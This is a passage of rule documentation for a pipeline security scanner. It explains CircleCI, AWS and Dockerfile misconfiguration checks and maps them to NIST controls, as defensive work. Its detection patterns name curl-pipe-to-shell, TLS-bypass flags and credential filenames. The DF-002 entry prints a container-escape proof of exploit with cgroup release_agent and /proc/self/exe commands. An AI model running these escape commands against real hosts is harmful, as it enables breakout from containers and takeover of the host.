How this is detected. Without no_output_timeout, a hung step can consume executor time indefinitely. Explicit timeouts cap cost and the window during which a compromised step has access to secrets and the build environment.
Recommendation. Add no_output_timeout: to long-running run steps, or set it at the job level. A reasonable default is 10-30 minutes. CircleCI's default of 10 minutes may be too long for some pipelines and absent for others.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-015 in the CircleCI provider.
CC-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a CircleCI config. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: CC-016 in the CircleCI provider.
CC-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a CircleCI config give the container full access to the runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-017 in the CircleCI provider.
CC-018: Package install from insecure source HIGH 🔧 fix
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a CircleCI config. These patterns allow man-in-the-middle injection of malicious packages.
Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-018 in the CircleCI provider.
CC-019: add_ssh_keys without fingerprint restriction HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. A bare - add_ssh_keys step (without fingerprints:) loads every SSH key configured on the project into the job. This violates least privilege, the job gains access to keys it does not need, increasing the blast radius if the job is compromised.
Recommendation. Always specify fingerprints: when using add_ssh_keys to restrict which SSH keys are loaded into the job. A bare add_ssh_keys step loads ALL project SSH keys.
Source: CC-019 in the CircleCI provider.
CC-020: No vulnerability scanning step MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: CC-020 in the CircleCI provider.
CC-021: Package install without lockfile enforcement MEDIUM 🔧 fix
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.
Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-021 in the CircleCI provider.
CC-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes.
How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.
Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Common build-tool bootstrapping idioms (
pip install --upgrade pip,pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by theDEP_UPDATE_REtooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require--min-confidence HIGHto ignore.
Source: CC-022 in the CircleCI provider.
CC-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-023 in the CircleCI provider.
CCM-001: CodeCommit repository has no approval rule template attached HIGH
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. Approval-rule templates are CodeCommit's analog of GitHub's branch-protection require-review. Without one associated, the repository accepts merges from any push-permitted principal, including the PR author themselves, without any second-pair-of-eyes gate.
Recommendation. Create a CodeCommit approval-rule template requiring at least one approval from a designated pool of reviewers and associate it with every repository. Without one, any PR author with push rights can self-approve and merge.
Source: CCM-001 in the AWS provider.
CCM-002: CodeCommit repository not encrypted with customer KMS CMK MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-28 Protection of Information at Rest.
How this is detected. Same shape as CA-001 / ECR-005 / S3 default encryption: the AWS-owned default key keeps the key policy under AWS, removing your ability to scope or audit Decrypt operations. Source code in the repo deserves the same key-policy + CloudTrail story you'd apply to artifacts in S3.
Recommendation. Recreate the repository with a kmsKeyId argument pointing at a customer-managed KMS key. CodeCommit encryption is set at creation and cannot be changed afterwards.
Source: CCM-002 in the AWS provider.
CCM-003: CodeCommit trigger targets SNS/Lambda in a different account MEDIUM
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. A repo trigger pointing at an SNS topic or Lambda in a different account fires under the receiving account's permissions on every push. Sometimes this is the intended shape (a centralized notifications account), but a cross-account fan-out from a compromised repo can drive actions in the receiving account that the source-account owner can't directly observe.
Recommendation. Move trigger targets into the same account as the repository or explicitly document the cross-account relationship. Cross-account triggers extend the blast radius of a repository compromise to whatever the target ARN can do.
Source: CCM-003 in the AWS provider.
CD-001: Automatic rollback on failure not enabled MEDIUM
Evidences: SA-10 Developer Configuration Management.
How this is detected. Without autoRollbackConfiguration, a CodeDeploy deployment that fails leaves the failed revision live until an operator notices. The default is opt-in, not opt-out, deployments fail-open, not fail-back.
Recommendation. Enable autoRollbackConfiguration with at least the DEPLOYMENT_FAILURE event so CodeDeploy automatically reverts to the last successful revision when a deployment fails.
Source: CD-001 in the AWS provider.
CD-002: AllAtOnce deployment config, no canary or rolling strategy HIGH
Evidences: SA-10 Developer Configuration Management.
How this is detected. AllAtOnce shifts 100% of traffic to the new revision in one step. There's no gradient to halt on if a CloudWatch alarm trips mid-rollout, the bad revision is already serving every request. Canary / linear configs introduce the shift-then-watch shape that lets monitors catch a regression before it's universal.
Recommendation. Switch to a canary or linear deployment configuration (e.g. CodeDeployDefault.LambdaCanary10Percent5Minutes or a custom rolling config) so that defects are caught before they affect all instances or traffic.
Source: CD-002 in the AWS provider.
CD-003: No CloudWatch alarm monitoring on deployment group MEDIUM
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. Alarm-based rollback is what lets a canary configuration actually stop a bad deploy mid-flight. Without alarms wired into alarmConfiguration, CodeDeploy's only signal that the deploy went wrong is the deployment-state machine itself, which doesn't notice an application-level regression. CD-002's canary work and this rule's alarm-based halt are paired.
Recommendation. Add CloudWatch alarms (e.g. error rate, 5xx count, latency p99) to the deployment group's alarmConfiguration. Enable automatic rollback on DEPLOYMENT_STOP_ON_ALARM to halt bad deployments.
Source: CD-003 in the AWS provider.
CP-001: No approval action before deploy stages HIGH
Evidences: SA-10 Developer Configuration Management, SA-15 Development Process, Standards, and Tools.
How this is detected. A pipeline that goes Source -> Build -> Deploy with no Approval action means every commit on the source branch ships, with no human ack between code-merged and code-running-in-prod. The Manual approval action is the intentional pause point, combine with CP-005 for production-tagged stages specifically.
Recommendation. Add a Manual approval action to a stage that precedes every Deploy stage that targets a production or sensitive environment.
Source: CP-001 in the AWS provider.
CP-002: Artifact store not encrypted with customer-managed KMS key MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection, SC-28 Protection of Information at Rest, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. The pipeline's S3 artifact store holds intermediate build outputs handed between stages. Default SSE-S3 (AES256) encrypts at rest but uses an AWS-owned key whose policy you can't scope. A customer-managed CMK gives the same key-policy + CloudTrail Decrypt-event audit story you'd apply to Lambda code, Secrets Manager, or any other build output.
Recommendation. Configure a customer-managed AWS KMS key as the encryptionKey for each artifact store. This enables key rotation, fine-grained access policies, and CloudTrail auditing of decrypt operations.
Source: CP-002 in the AWS provider.
CP-003: Source stage using polling instead of event-driven trigger LOW
Evidences: CM-6 Configuration Settings.
How this is detected. PollForSourceChanges=true polls the source repo every minute or two. Beyond the API-quota and latency cost, polling produces a less-useful CloudTrail story than event-driven triggers. You see the poll calls, not the specific commit that started the pipeline. EventBridge / CodeCommit triggers tie each pipeline start to the originating event.
Recommendation. Set PollForSourceChanges=false and configure an Amazon EventBridge rule or CodeCommit trigger to start the pipeline on change. This reduces latency, API usage, and improves auditability.
Known false positives.
PollForSourceChanges=trueis the CFN default for CodeCommit sources, so legacy templates can carry the flag without an active design decision behind it. The rule is advisory (consider EventBridge / CodeStarSourceConnection) rather than a real risk; defaults to LOW confidence so CI gates default-filter it.
Source: CP-003 in the AWS provider.
CP-004: Legacy ThirdParty/GitHub source action (OAuth token) HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. The legacy ThirdParty/GitHub source-action provider stores a long-lived OAuth token in the pipeline's action configuration. The token has whatever scope the granting GitHub user has, never rotates, and isn't directly revocable from the AWS side. CodeConnections (formerly CodeStar Connections) replaces this with an AWS-managed connection that the GitHub user can revoke.
Recommendation. Migrate to owner=AWS, provider=CodeStarSourceConnection and reference a CodeConnections connection ARN.
Source: CP-004 in the AWS provider.
CT-001: No active CloudTrail trail in region HIGH
Evidences: AU-2 Event Logging, AU-9 Protection of Audit Information, AU-12 Audit Record Generation.
How this is detected. CloudTrail is the only AWS-native source of record for management-plane API calls. A region with no active trail blinds incident responders: a pipeline compromise is invisible once the in-memory CloudWatch buffer rolls over.
Recommendation. Create a CloudTrail trail that logs management events in this region and start logging. Without a trail, CodeBuild/CodePipeline/IAM API activity, including credential changes during a compromise, has no durable audit record.
Source: CT-001 in the AWS provider.
CT-002: CloudTrail log-file validation disabled MEDIUM
Evidences: AU-9 Protection of Audit Information, SI-7 Software, Firmware, and Information Integrity.
How this is detected. CloudTrail logs are S3 objects. Without log-file validation, an attacker with s3:PutObject on the trail bucket can edit log files to remove evidence of their activity, and there's no digest to compare against. With validation on, every hour of logs is summarized in a signed digest file under CloudTrail-Digest/.
Recommendation. Set LogFileValidationEnabled=true on every CloudTrail trail. Log validation produces a signed digest file alongside each log object so tampering by an attacker who also has S3 write access can be detected after the fact.
Source: CT-002 in the AWS provider.
CT-003: CloudTrail trail is not multi-region MEDIUM
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. An attacker who knows your CloudTrail trail is regional deliberately operates from a different region. Multi-region trails capture management events from every region into a single trail, closing the gap without you having to enumerate which regions you actually use.
Recommendation. Convert the trail to a multi-region trail. A single-region trail misses activity in every other region, an attacker aware of the scope can drive reconnaissance or persistence from an unlogged region.
Source: CT-003 in the AWS provider.
CW-001: No CloudWatch alarm on CodeBuild FailedBuilds metric LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Failure-rate signals are how on-call learns about an unfamiliar build crashing in a loop, an attacker probing the build environment, or a CI quota being exhausted. CloudWatch captures the FailedBuilds metric automatically, the alarm is the missing fan-out.
Recommendation. Create a CloudWatch alarm on the AWS/CodeBuild namespace FailedBuilds metric (aggregated or per-project). Without one, repeated build failures during a compromise, or a runaway fork-PR build, won't reach on-call.
Source: CW-001 in the AWS provider.
CWL-001: CodeBuild log group has no retention policy LOW
Evidences: AU-2 Event Logging, AU-11 Audit Record Retention.
How this is detected. CloudWatch Logs created by CodeBuild default to Never Expire retention. Build logs frequently echo secrets accidentally (a set -x script, an env dump in an error trace), so unbounded retention extends the exposure window for every secret a build has ever leaked. A short-but-finite retention also caps cost.
Recommendation. Set a retention policy on every /aws/codebuild/* log group. The default is 'Never Expire', which both racks up storage cost and keeps logs indefinitely past any compliance window.
Source: CWL-001 in the AWS provider.
CWL-002: CodeBuild log group not KMS-encrypted MEDIUM
Evidences: AU-9 Protection of Audit Information, SC-12 Cryptographic Key Establishment and Management, SC-28 Protection of Information at Rest.
How this is detected. CloudWatch Logs default encryption is service-managed, fine for confidentiality, but no audit trail or scoping. Build logs are a frequent secret-leak vector (CWL-001's rationale extended), so the same key-policy + Decrypt-event story you'd apply to S3 / Lambda / Secrets Manager is warranted here too.
Recommendation. Associate a customer-managed KMS key with every /aws/codebuild/* log group via associate-kms-key. Logs often contain secret material accidentally echoed by builds; encrypting them with a CMK means the key policy controls who can read the logs, not just S3/CloudWatch IAM.
Source: CWL-002 in the AWS provider.
DF-001: FROM image not pinned to sha256 digest HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Reuses _primitives/image_pinning.classify so the floating-tag semantics match GL-001 / JF-009 / ADO-009 / CC-003. PINNED_TAG (e.g. python:3.12.1-slim) is treated as unpinned here too, only an explicit @sha256: survives, since the tag is mutable on the registry side.
Recommendation. Resolve every base image to its current digest (docker buildx imagetools inspect <ref> prints it) and pin via FROM repo@sha256:<digest>. Automate refreshes with Renovate or Dependabot. A floating tag (:latest, :3, no tag) silently swaps the build base under every rebuild.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- Docker Hub typosquatting / namespace-takeover incidents (2017 onward): docker-library Sysdig and Aqua research documented thousands of malicious images uploaded under near-miss names (
alpinevsalphine, etc.) and occasional namespace recoveries shipping crypto-miners downstream. Digest-pinned consumers are immune; tag-pinned consumers pull whatever sits under the name today. - Codecov
codecov/codecov-actiontag-mutation incident (post-Codecov-Bash-uploader compromise): the upstream rotated the action's@v3tag during the fallout, and consumers pinning to the tag silently re-ran a different build than before. Digest pinning would have surfaced the change as a checksum mismatch instead of a silent swap.
Source: DF-001 in the Dockerfile provider.
DF-002: Container runs as root (missing or root USER directive) HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Multi-stage builds: only the final stage matters for runtime identity, since intermediate stages don't ship. The check scopes USER to the last FROM through end-of-file.
Recommendation. Add a USER <non-root> directive after package install steps (e.g. USER 1001 or USER appuser). Running as root inside a container is not isolation, a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2019-5736 (runC host breakout): a malicious container running as root could overwrite the host's runC binary and compromise every other container on the node. Non-root containers were not exploitable.
- CVE-2022-0492 (cgroups v1 escape via release_agent): root inside a container with CAP_SYS_ADMIN could write to the host's release_agent file and execute arbitrary host code. Containers running as a non-root UID side-stepped the exploit class entirely.
Proof of exploit.
Vulnerable: image runs as root by default (no USER set).
FROM ubuntu:22.04 RUN apt-get update && apt-get install -y python3 COPY app.py /app/ CMD ["python3", "/app/app.py"]
Attack: when the container is breached (RCE in the app, a
kernel CVE, a misconfigured mount), the attacker runs as
UID 0. From there:
# CVE-2019-5736 path: overwrite /proc/self/exe to corrupt
# the host's runC binary — every container on the node
# the next launch executes attacker code on the host:
echo '#!/bin/sh\n/attacker_payload' > /proc/self/exe
# CVE-2022-0492 path: cgroup release_agent escape:
mkdir /tmp/cg && mount -t cgroup -o memory cgroup /tmp/cg
echo '/payload' > /tmp/cg/release_agent
echo 1 > /tmp/cg/notify_on_release
A non-root UID makes both paths fail at the first syscall.
Safe: drop to a dedicated unprivileged user.
FROM ubuntu:22.04 RUN apt-get update && apt-get install -y python3 \ && useradd --uid 1001 --create-home app COPY --chown=app:app app.py /app/ USER 1001 CMD ["python3", "/app/app.py"]
Source: DF-002 in the Dockerfile provider.
DF-003: ADD pulls remote URL without integrity verification HIGH
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. ADD with a URL is the historical Dockerfile footgun: it fetches at build time over HTTP(S) with no checksum and no signature, and the registry tag does not pin the source. A tampered server or DNS hijack silently swaps the content. COPY is for local files; RUN curl + verify is for remote ones.
Recommendation. Replace ADD https://... with a multi-step RUN: download the file with curl -fsSLo, verify a known-good checksum (sha256sum -c) or signature (cosign verify-blob), then extract / install. Better still: download the artifact in a builder stage and COPY it across. That way the verifier runs once at build time, not per-pull.
Source: DF-003 in the Dockerfile provider.
DF-004: RUN executes a remote script via curl-pipe / wget-pipe HIGH
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Reuses _primitives/remote_script_exec.scan so the vocabulary matches the equivalent CI-side rules (GHA-016, GL-016, BB-012, ADO-016, CC-016, JF-016).
Recommendation. Download to a file, verify checksum or signature, then execute. curl -fsSL <url> -o /tmp/x.sh && sha256sum -c <(echo '<digest> /tmp/x.sh') && bash /tmp/x.sh. Vendor installers from well-known hosts (rustup.rs, get.docker.com, ...) are reported with vendor_trusted=true so reviewers can calibrate.
Source: DF-004 in the Dockerfile provider.
DF-005: RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Reuses _primitives/shell_eval.scan, same primitive used by GHA-028 / GL-026 / BB-026 / ADO-027 / CC-027 / JF-030 so the safe / unsafe vocabulary matches across the tool.
Recommendation. Replace eval "$X" and sh -c "$X" with explicit argv invocations. If the build genuinely needs a templated command, render it through a sealed config file or use RUN --mount=type=secret with explicit input. $( … ) / backticks should never wrap interpolated user-controlled vars inside a Dockerfile.
Source: DF-005 in the Dockerfile provider.
DF-006: ENV or ARG carries a credential-shaped literal value CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS keys outright (the literal AWS access-key shape) and credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal.
Recommendation. Never hard-code credentials in a Dockerfile. ENV values are baked into the image layer history, even if the value is later overwritten, docker history --no-trunc reads the original. Use RUN --mount=type=secret for build-time secrets or runtime env injection (docker run -e SECRET=…) for runtime ones. Rotate any secret already exposed.
Source: DF-006 in the Dockerfile provider.
DF-007: No HEALTHCHECK directive declared LOW 🔧 fix
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. This is a defense-in-depth signal rather than an exploitation indicator, severity is LOW. A missing healthcheck doesn't create a vulnerability on its own, but downstream orchestrators (Kubernetes, ECS, Compose) cannot recover an unhealthy container they cannot detect, and that turns a soft failure (slow leak, deadlock) into a stale-process incident.
Recommendation. Declare a HEALTHCHECK so the orchestrator can detect stuck or zombie containers. Example: HEALTHCHECK --interval=30s --timeout=5s --retries=3 CMD curl -fsS http://localhost/healthz || exit 1. Skip this for builder/multi-stage intermediate images, only the runtime image needs one.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-007 in the Dockerfile provider.
DF-008: RUN invokes docker --privileged or escalates capabilities HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Mirrors GHA-017 / GL-017 / BB-013 / ADO-017 / CC-017 / JF-017 (docker run --privileged in CI scripts) but at Dockerfile build time. The risk is subtler: a privileged RUN step doesn't directly elevate the resulting image, but it gives the build host's docker daemon a chance to escape, and any tampered base image can exploit the elevated build.
Recommendation. A Dockerfile build step almost never legitimately needs --privileged or --cap-add SYS_ADMIN / ALL. If the build genuinely requires elevated capabilities (e.g. compiling a kernel module), do it in a sealed builder image and COPY the artifact out, don't carry the privileged execution into the runtime image.
Source: DF-008 in the Dockerfile provider.
DF-009: ADD used where COPY would suffice LOW
Evidences: CM-6 Configuration Settings.
How this is detected. Pure-local ADD <path> <dest> is functionally identical to COPY, but ships extra-feature surface (URL fetch, tarball auto-extract) that adds nothing and turns a benign-looking filename change into a behavior change. The Docker docs have recommended COPY for non-URL inputs since 2014.
Recommendation. Replace ADD ./local with COPY ./local. ADD has two implicit behaviors that make it the wrong default. It fetches HTTP(S) URLs and it auto-extracts .tar / .tar.gz archives. Both are easy to invoke accidentally and neither is reproducible. Reserve ADD for a deliberate URL-pull (covered by DF-003) or an explicit tarball extract.
Source: DF-009 in the Dockerfile provider.
DF-010: apt-get dist-upgrade / upgrade pulls unknown package versions LOW
Evidences: CM-2 Baseline Configuration, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes.
How this is detected. Running apt-get upgrade (or dist-upgrade) inside a Dockerfile is the classic pet-vs-cattle anti-pattern. Two back-to-back builds with the same Dockerfile can produce different images because the upstream archive moved between the two RUN invocations. dist-upgrade additionally relaxes dependency resolution. It can install / remove arbitrary packages to satisfy upgrades, so the resulting image's package set isn't even bounded by what the Dockerfile declares.
Recommendation. Drop the upgrade step. Build on a recent base image instead (rebuild your image when the base image gets a security patch, pin the base by digest per DF-001 so the rebuild is deterministic). apt-get install pkg=<version> for specific packages stays reproducible; upgrade / dist-upgrade does not.
Source: DF-010 in the Dockerfile provider.
DF-011: Package manager install without cache cleanup in same layer LOW
Evidences: CM-6 Configuration Settings.
How this is detected. Each Dockerfile RUN produces a layer. Installing packages in one layer and cleaning the cache in a later layer leaves the cache files in the lower layer forever, final image size is unchanged and the residual files broaden the attack surface (e.g. apt's signed-by keys, package metadata). The fix is layout, not behavior: do install + cleanup in the same RUN.
Recommendation. Combine the install and cleanup into the same RUN so the cache lands in a single layer that gets discarded together. Idiomatic pattern: RUN apt-get update && apt-get install -y <pkgs> && rm -rf /var/lib/apt/lists/*. Equivalent forms: apk add --no-cache <pkgs>, dnf install -y … && dnf clean all, yum install -y … && yum clean all, zypper -n in … && zypper clean -a.
Source: DF-011 in the Dockerfile provider.
DF-012: RUN invokes sudo HIGH
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. sudo inside a Dockerfile is almost always a copy-paste from a host README. Its presence usually means one of three things, all of them wrong: (a) the build is silently running as root and the operator misread it, (b) the image carries an unrestricted sudoers line that a runtime escape can abuse, or (c) the package install chain depends on TTY-aware sudo behavior that breaks under non-TTY docker build. None of these cases benefit from keeping the directive.
Recommendation. Drop sudo from the RUN. Either the build is already running as root (the default before any USER directive), in which case sudo is no-op noise, or the build switched to a non-root USER and needs root for a specific step, in which case temporarily revert with USER root for that RUN and switch back afterward.
Source: DF-012 in the Dockerfile provider.
DF-013: EXPOSE declares sensitive remote-access port CRITICAL 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. EXPOSE is documentation, not a firewall. It doesn't actually open the port. But EXPOSE 22 is a strong signal the image runs sshd, and any remote-access daemon inside the container blows up the threat model: now you have an extra auth surface, an extra service to keep patched, and a way for a compromised app to phone home from the outside. The container runtime / orchestrator's exec path covers every operational use case sshd traditionally served.
Recommendation. Remove the EXPOSE line for the remote-access port. If the operator legitimately needs to reach the container, exec into it (docker exec / kubectl exec). That path uses the orchestrator's auth and audit, doesn't open a network port, and doesn't ship an extra daemon inside the image. Containers should not run sshd / telnetd / ftpd / rsh-d / vncd / RDP alongside the application.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-013 in the Dockerfile provider.
DF-014: WORKDIR set to a system / kernel filesystem path CRITICAL
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Subsequent directives in the Dockerfile (COPY src dest, RUN writes, ADD …) resolve relative paths against the active WORKDIR. A WORKDIR /sys followed by COPY conf.txt config.txt writes into the kernel's sysfs surface, at best a build-time error, at worst a container-escape primitive that lets a compromised step manipulate cgroups, devices, or kernel config.
Recommendation. Move WORKDIR to a dedicated app directory (/app, /srv/app, /opt/<service>). System paths like /sys, /proc, /dev, /etc, / and the root home are not application directories, pointing the working dir at one means subsequent COPY / RUN writes target kernel-exposed namespaces or admin-only configuration.
Source: DF-014 in the Dockerfile provider.
DF-015: RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. World-writable directories under / are an established container-escape vector: any compromised process running as non-root can drop a payload that root-owned daemons later execute. The rule fires on the literal 777, a+w, and a+rwx modes; the more conservative 775 and ugo+x are not flagged.
Recommendation. Replace chmod 777 <path> with the narrowest permissions the workload actually needs. chmod 755 is enough for executables under a read-only root filesystem; 640 or 600 for files the runtime user reads. a+w is almost always copy-pasted from a SO answer and almost never the correct fix.
Known false positives.
- Test fixtures or scratch builds that intentionally share a directory across multiple non-root users may legitimately use
777. Suppress with an ignore-file entry rather than weakening the rule.
Source: DF-015 in the Dockerfile provider.
DF-016: Image lacks OCI provenance labels LOW
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. The OCI image-spec annotation set is a small de facto standard maintained by the OCI working group. Only image.source and image.revision are checked because they're the two whose absence makes incident response materially harder; image.title / image.description are nice-to-have but the rule doesn't fire on those.
Recommendation. Add a LABEL line carrying at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). Most registries surface those fields in the UI and on manifest inspect, which closes the source-to-image gap that GHA-006 / SLSA Build-L2 provenance attestation also addresses.
Known false positives.
- A multi-stage build's intermediate stages don't need provenance labels, only the final image ships. The rule fires per Dockerfile, not per stage; suppress for files where the final
FROMis intentional throwaway scratch.
Source: DF-016 in the Dockerfile provider.
DF-017: ENV PATH prepends a world-writable directory MEDIUM 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. A writable PATH entry that comes before the system bins lets any process inside the container shadow ls, ps, apt-get, cat, etc. by dropping a binary of the same name into the writable dir. On a multi-tenant image, or any image where an exploit can reach the filesystem, this is a free privilege-escalation vector.
Recommendation. Don't put /tmp, /var/tmp, /dev/shm, or any other world-writable path in PATH ahead of the system binary directories. Drop those entries entirely, or place them at the tail (ENV PATH=/usr/bin:$PATH:/tmp) so legitimate binaries always shadow anything dropped into the writable dir at runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-017 in the Dockerfile provider.
DF-018: RUN chown rewrites ownership of a system path MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Recognises chown and chgrp invocations whose first non-flag path argument resolves under a system directory. The non-recursive case is also flagged because a single chown user /etc is just as harmful, the recursive flag matters for the size of the blast radius, not for whether it's wrong. Application paths under /opt, /srv, /var/lib/<app>, and /app are not flagged.
Recommendation. Don't chown system directories at build time. If the runtime user needs to own a workload-specific subtree, COPY --chown=<user>:<group> it into the image at the subtree root, or place the workload under a dedicated directory (e.g. /app, /srv/app) and chown only that path. Granting the runtime user write access to /etc, /usr, /sbin, or /lib lets a process exploit later steps to stage a binary the system trusts.
Source: DF-018 in the Dockerfile provider.
DF-019: COPY/ADD source path looks like a credential file HIGH 🔧 fix
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Fires on any COPY or ADD whose source basename is a well-known credential filename (id_rsa, .npmrc, .netrc, .env, terraform.tfvars, …) or whose path tail matches a canonical credential location (.aws/credentials, .docker/config.json, .kube/config). Files with private-key extensions (.pem, .key, .p12, .pfx, .jks) are also flagged. Globs are not expanded, the rule reads the literal source token.
